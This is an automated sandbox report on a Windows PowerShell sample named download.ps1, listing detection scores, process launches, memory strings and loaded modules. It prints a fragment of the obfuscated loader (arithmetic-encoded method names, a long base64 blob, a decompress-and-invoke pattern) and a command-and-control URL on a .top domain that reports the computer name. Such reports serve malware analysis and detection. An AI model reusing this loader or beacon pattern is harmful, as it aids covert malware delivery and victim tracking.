Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
download.ps1

Overview

General Information

Sample name:download.ps1
Analysis ID:1578248
MD5:f91e3c78bfc0cc41330d65764455a851
SHA1:294c15d09a7df4d91e891d7ca3bc2803c8262ce1
SHA256:3cef01524b94194e6e6834746b8215ebdd4b51c29e92187d6e59e8be1b365934
Infos:

Detection

Score:68
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Loading BitLocker PowerShell Module
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64native
  • powershell.exe (PID: 7452 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 6596 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • cleanup
No configs have been found
No yara matches
Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 5068, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", ProcessId: 7452, ProcessName: powershell.exe
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 5068, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", ProcessId: 7452, ProcessName: powershell.exe
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: http://cmacnnkfbhlcncm.topAvira URL Cloud: Label: malware
Source: download.ps1Virustotal: Detection: 8%Perma Link
Source: Binary string: ion.pdbcyTk source: powershell.exe, 00000000.00000002.41066212714.0000026EAAC62000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: softy.pdb source: powershell.exe, 00000000.00000002.41066212714.0000026EAAC62000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.41030903631.0000026E907A3000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.41066212714.0000026EAAD8F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb} source: powershell.exe, 00000000.00000002.41068311710.0000026EAB054000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\System.Management.Automation.pdbQ source: powershell.exe, 00000000.00000002.41068311710.0000026EAB054000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000000.00000002.41066212714.0000026EAAC62000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbOypk source: powershell.exe, 00000000.00000002.41066212714.0000026EAAC62000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb34e089 source: powershell.exe, 00000000.00000002.41068311710.0000026EAB054000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: gement.Automation.pdbnSS% source: powershell.exe, 00000000.00000002.41068311710.0000026EAB054000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.41066212714.0000026EAAD8F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdbo source: powershell.exe, 00000000.00000002.41068311710.0000026EAB054000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbq source: powershell.exe, 00000000.00000002.41068311710.0000026EAB054000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbj source: powershell.exe, 00000000.00000002.41068311710.0000026EAB054000.00000004.00000020.00020000.00000000.sdmp
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
Source: global trafficDNS traffic detected: DNS query: cmacnnkfbhlcncm.top
Source: powershell.exe, 00000000.00000002.41032039963.0000026E93B0F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://$jp1hlsae28owqrv/$nkg635ix9hrwbzc.php?
Source: powershell.exe, 00000000.00000002.41032039963.0000026E93B0F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://$jp1hlsae28owqrv/$nkg635ix9hrwbzc.php?id=$env:computername&key=$ijkcxgoqtupsma&s=527
Source: powershell.exe, 00000000.00000002.41032039963.0000026E93A8D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.41032039963.0000026E934F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cmacnnkfbhlcncm.top
Source: powershell.exe, 00000000.00000002.41032039963.0000026E93A8D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.41032039963.0000026E934F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cmacnnkfbhlcncm.top/9ciszeq80lhtr.php?id=computer&key=15935922840&s=527
Source: powershell.exe, 00000000.00000002.41032039963.0000026E93A8D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cmacnnkfbhlcncm.top/9ciszeq80lhtr.php?id=computer&key=15935922840&s=527p
Source: powershell.exe, 00000000.00000002.41064416025.0000026EAA920000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: powershell.exe, 00000000.00000002.41064416025.0000026EAA920000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000000.00000002.41065685822.0000026EAAA40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micr
Source: powershell.exe, 00000000.00000002.41058553820.0000026EA2994000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000000.00000002.41032039963.0000026E92AF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000000.00000002.41032039963.0000026E92AF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.pngXz
Source: powershell.exe, 00000000.00000002.41032039963.0000026E92AF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000000.00000002.41032039963.0000026E92921000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000000.00000002.41032039963.0000026E92AF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000000.00000002.41032039963.0000026E92AF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000000.00000002.41032039963.0000026E92AF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmlXz
Source: powershell.exe, 00000000.00000002.41064416025.0000026EAA920000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadis.bm0
Source: powershell.exe, 00000000.00000002.41032039963.0000026E92921000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000000.00000002.41058553820.0000026EA2994000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000000.00000002.41058553820.0000026EA2994000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000000.00000002.41058553820.0000026EA2994000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000000.00000002.41032039963.0000026E92AF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000000.00000002.41032039963.0000026E92AF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/PesterXz
Source: powershell.exe, 00000000.00000002.41032039963.0000026E94AEA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
Source: powershell.exe, 00000000.00000002.41058553820.0000026EA2994000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000000.00000002.41064416025.0000026EAA920000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF8D1B28B320_2_00007FF8D1B28B32
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF8D1B27D860_2_00007FF8D1B27D86
Source: classification engineClassification label: mal68.evad.winPS1@2/7@2/0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6596:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6596:304:WilStaging_02
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_drm1igxw.dvr.ps1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress)) $049h8rxnvqfbt27.(([system.String]::new(@((235505/(16643525/4735)),(238317/(5977248/2784)),(-9346+(1827+(7527+(-5188+5292)))),(-4857+(-770+(3789+(-4097+(11413-(734+(9380-(5285027/1111)))))))),(6501-(15043-(537+8089))),(-3722+3833)))))( $sgvhtey7i8axq3r ) $049h8rxnvqfbt27.(([system.String]::new(@((279926/4178),(56484/(2982-(2132+(-7110+(10569-(-4136+(1930+(-733+(10266061/(12158290/(3350540/(4170234/8949)))))))))))),(2320-(717925/325)),(9204-9089),(-9836+9937)))))()$0lu51qr8owa9zh37ywckn3xdhbuie.(([system.String]::new(@((6297-6230),(-8043+8151),(353646/(12145032/(11016-(10521-3317)))),(-212+327),(970610/(17833-8223))))))()[byte[]] $ioj8fg7y3huk5a6 = $sgvhtey7i8axq3r.(([system.String]::new(@((-8712+(9714-918)),(629481/5671),(-6254+6319),(4095-3981),(1024860/(-1084+10074)),(10114-10017),(847847/7007)))))() $uykm374xtfghd2z=$ioj8fg7y3huk5a6 return $uykm374xtfghd2z}[System.Text.Encoding]::ascii.((-join (@((216337/(4948328/1624)),(683265/(-976+(7321+420))),(4552-4436),(-855+(4385150/4675)),(760148/6553),(-6942+(373+6683)),(8509-8404),(766590/6969),(6417-(64364916/10194)))| ForEach-Object { [char]$_ })))((nvgh3e65mupyqljs8obki24acw1 "ffprNjRmdW93dp3kOf5+4UXj6iwzidm4Ap1QXwMdqkBR/jwIgE2mMNbhSWcxNmpbE1m9DyBPvJWcj24tfQMrX3BM02LgBZ43la/WnWLLIDqeuVYEBI7az/nF0pidSMKEp7qomfr5C5CViIv/7Z+/CksVC5Cmk/2rRYb8CI1aChwKjd6BNQYcTsackJKcaAaCnJpY8ctayjOMneHn/E8dwN6UiaqsWNcm3AsaQN+ePhjIA8SanPLYGYqeh6QMTSYb+kK0G7K0upELOoG1cMd3XdXBwNti4Vu0W7b15KIcaggPKEtgQxzGufApVsrGsfLHkJlOuRnpSZueL3shBHo6iX7TIYFDxYbKpC2wJH/ti6x7fUetWOZ/vAkEGFLH0zWDEHxe84R7BnHC8WbO/AKyY26nv3kR7BPT79LR7AAALhwZKvnnoYuT3/H1tnCN9gmE/TYVq80E3DSdM9MmG707uImxx/sTAWYTqseWbNduALxZRU8nJZooL42NqzUIvEuZNTylPVVbo7YqpCIb+TpsA+4D1qsVae6+AamBlOEQqECAXUWuMexaWthcrNWKIDTZp4SrZM/0F/ONtiCBFOvemYXxGahiHGb3S4elXP4QkV4CBBxJuRzbgZh1TghKDJUO+UXwIKUdmSSoSdTF58TU/OqYC5eApS+HE4adtcHJgnHtqYdEnglTqc2Uk5BtCAJDGRaqtXpMAjn3s68q5ChM4yoXVnHux1kRA+faKz/B4yWqPO1h2VLWAi+g4BRfKiwUvQQDG9jXsfvhKy8L7jTkBrcoULovoC4L0MrHpwVam8kUh7jqxaxR1GGeAI7k2p6OxjQHWo56LnUP/I/f7NIOFaMfA5WAsdvMXcs1cB7V7RyX8HUjlzoZe0mjiy7kkSigp7GfzPmqKIl9rttAWS9TdUMB3JeYJFPvrfx9Dv4LgV5maIH2SjIvTzzIPBuTks7NUFIIEzCd3cYdG76FagqiGXIzqaHpnQLzwJNAcUOQrOLk2RdWjU5b6IgahIWPmv+3DI2wudvlvA5OCUbAm4S+cRupClWPDsuag8aU6UiVgZaW3V9Xfa4+2Chm+PZDLXBJlbfxZFQtbUWZcuLsVcOefhAKm+sUwTePPO28y8KQlMiYaJ+9PoJXKiwN+Lt7iJ7bz29aLlZHM90RGgGyxertLEMq1I0Ooxbgx6uM4ZZ+Wvo2IDiU8Seme81kS13xV3i6wUmX4EyKQ4yDUe8q9Dezq6k7xu5ncRhBkF1nXv4k5MvMBBKewAipVA3wzKGXx0nOkx0aOXy6wFTdfEHVWoS6TAiwQ2Wd4rIV3v9jeLT5axoYs3dunlW4xDykMWf9G5yivrTMWKiZqxOBiu3PTW88iooVwVOBSbdXFK5aykaYDWjX6kupgCJwzqFf8KhqtrKxfF4k+01sHp+kythWM24FtEj+tqjBkgKVoTM7/NSUHapnUSJUxnebNjJ10+6+7MM31MQR1qLBTZ8xxik9SWZyGagxJGFAhtUBts1+bVPXHAF1qHqqQoZjYUCrlYByFo22sDqTHQQNl/vVJpRztQLMKKfvDsH6Es+pGlK6iMiYkIqKlWMH2Q0Sx9D9WlCMivGBCejte3H2H/8yckJljn04GiKpmd0WBTUBKVb0Nn4r3Wdr51R7UpFdWlJNiclzaoF6CnF2LeXnldULH1cG+92jOH5Q7n/NzjKxEGjODvwEQN/D5n61nDwL3XRVlv13TfpFDtNMYJjSA3mWvm6rPhvQq/R8fSBBA2tIgIp/ZcDTy/hLbJ+2YChgkYOMmQJATk6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: download.ps1Virustotal: Detection: 8%
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: Binary string: ion.pdbcyTk source: powershell.exe, 00000000.00000002.41066212714.0000026EAAC62000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: softy.pdb source: powershell.exe, 00000000.00000002.41066212714.0000026EAAC62000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.41030903631.0000026E907A3000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.41066212714.0000026EAAD8F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb} source: powershell.exe, 00000000.00000002.41068311710.0000026EAB054000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\System.Management.Automation.pdbQ source: powershell.exe, 00000000.00000002.41068311710.0000026EAB054000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000000.00000002.41066212714.0000026EAAC62000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbOypk source: powershell.exe, 00000000.00000002.41066212714.0000026EAAC62000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb34e089 source: powershell.exe, 00000000.00000002.41068311710.0000026EAB054000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: gement.Automation.pdbnSS% source: powershell.exe, 00000000.00000002.41068311710.0000026EAB054000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.41066212714.0000026EAAD8F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdbo source: powershell.exe, 00000000.00000002.41068311710.0000026EAB054000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbq source: powershell.exe, 00000000.00000002.41068311710.0000026EAB054000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbj source: powershell.exe, 00000000.00000002.41068311710.0000026EAB054000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF8D19FD2A5 pushad ; iretd 0_2_00007FF8D19FD2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF8D1B12293 pushad ; iretd 0_2_00007FF8D1B1232D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF8D1B1B1ED push ebx; retf 0_2_00007FF8D1B1B212
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF8D1B1B312 pushad ; retf 0_2_00007FF8D1B1B321
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF8D1B166D3 push F8D1CFD2h; iretd 0_2_00007FF8D1B1681A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF8D1B156EB push F8D1CFB8h; iretd 0_2_00007FF8D1B15A7A

Hooking and other Techniques for Hiding and Protection

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
